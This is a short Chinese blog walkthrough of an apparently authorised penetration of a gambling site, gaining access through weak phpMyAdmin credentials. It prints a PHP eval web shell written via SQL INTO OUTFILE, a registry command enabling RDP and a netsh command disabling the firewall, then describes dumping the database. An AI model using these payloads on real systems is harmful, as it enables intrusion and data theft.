一次弱口令滲透BC站

因爲某種原因,接手了一個授權的bc站。
內心是拒絕的,但是沒辦法,硬着頭皮收下了。
其實都知道,bc站不是很好弄,在大佬眼裏,可能就是掏出一個0day就進去了
但像我這種dd,只敢遠觀。
打開主頁,還算清新的畫風,比那些打開就這閃那閃花裏胡哨的站舒服多了。在這裏插入圖片描述

簡單的掃了一下目錄,掃出了兩個比較有用的的東西就是一個後臺,一個探針
見到後臺,廢話不多說,直接弱口令套餐來一份

得到的結果肯定是 密碼錯誤X1 密碼錯誤X2 密碼錯誤X3…………
在這裏插入圖片描述
算了,不浪費時間了,看一下探針~ 根據探針,得知網站的根目錄。底下有phpmyadmin的連接測試
在這裏插入圖片描述

直接弱口令再來一套,root root 密碼錯誤
Root 123456 密碼錯 唉 不對 好像是連接成功了
在這裏插入圖片描述
激動的留下了眼淚
根據探針,得知phpmyadmin的後臺地址
在這裏插入圖片描述
Root 123456
登錄

在這裏插入圖片描述

Phpmyadmin進來了,網站根目錄也知道了,那還嘮啥了,直接拿shell了
直接執行sql語句
select’<?php @eval($_POST[pass]);?>’ into outfile ‘D:/xxx/xxx/xxx.php’

一句話連接上,在這裏插入圖片描述
Whoami system ………… 這還玩啥了,提權都不用了
在這裏插入圖片描述
通過查看服務器文件,得知後臺登陸密碼,登陸後臺
在這裏插入圖片描述

因爲個人喜好,比較喜歡用cs,powshell上線
讀了一下密碼,直接遠程連接

在這裏插入圖片描述
但是
在這裏插入圖片描述
netstat -an ,沒開3389
在這裏插入圖片描述

開啓3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

但是連接了一下,還是不行,用nmap掃描了一下端口,只有80端口開放

應該是開着防火牆netsh firewall set opmode mode=disable 關閉防火牆
在這裏插入圖片描述

再連接3389 連接成功

在這裏插入圖片描述

根據瀏覽器歷史記錄,又發現另一個網站
在這裏插入圖片描述

其實沒啥了,直接數據庫打包~完活上交。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章